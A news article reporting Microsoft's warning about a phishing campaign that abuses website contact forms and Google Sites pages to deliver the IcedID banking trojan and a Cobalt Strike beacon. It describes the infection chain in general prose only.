Cyber attackers are using company website contact forms to deliver the IcedID info-stealing malware, Microsoft has warned.
The attack involves phishing emails with fake legal threats that attempt to manipulate recipients into clicking a link in the email to review supposed evidence behind their allegations, but instead, they download the IcedID malware.
IcedID (BokBot) is a banking trojan first spotted in 2017. The trojan targets user financial information and is capable of acting as a dropper for other malware.
It appears that this phishing campaign detected by the Microsoft 365 Defender Threat Intelligence Team, has found a way to circumvent contact forms' CAPTCHA protection to flood organizations with phishing emails.
“Attackers are abusing legitimate infrastructure, such as websites’ contact forms, to bypass protections, making this threat highly evasive. In addition, attackers use legitimate URLs, in this case Google URLs that require targets to sign in with their Google credentials,” the threat intelligence team wrote. “The emails are being used to deliver the IcedID malware, which can be used for reconnaissance and data exfiltration, and can lead to additional malware payloads, including ransomware.”
The malicious messages that arrive in the recipient’s inbox from the contact form query seem to be trustworthy since they were sent from trusted email marketing systems. The emails are originating from the recipient’s own contact form on their website, which means that they appear as sent by an actual customer interaction or inquiry.
The phishing message also contains a link to a sites.google.com page to view the alleged stolen photos. When clicking on the link the victim is presented with a Google page that requires them to sign in with their Google credentials.
After the victim signs in, the Sites Google page automatically downloads a malicious ZIP file, which contains a heavily obfuscated .js file. The malicious .js file is executed via WScript to create a shell object for launching PowerShell to download the IcedID payload, which is decrypted by a dropped DLL loader, as well as a Cobalt Strike beacon in the form of a stageless DLL, allowing attackers to remotely control the compromised device.
In case the Sites Google page is not available, attackers turn to a secondary attack chain, redirecting users to a .top domain, while unintentionally accessing a Google User Content page, which downloads the malicious .ZIP file.
“While this specific campaign delivers the IcedID malware, the delivery method can be used to distribute a wide range of other malware, which can in turn introduce other threats to the enterprise. IcedID itself is a banking trojan that has evolved to become an entry point for more sophisticated threats, including human-operated ransomware. It connects to a command-and-control server and downloads additional implants and tools that allow attackers to perform hands-on-keyboard attacks, steal credentials, and move laterally across affected networks to delivering additional payloads,” Microsoft said.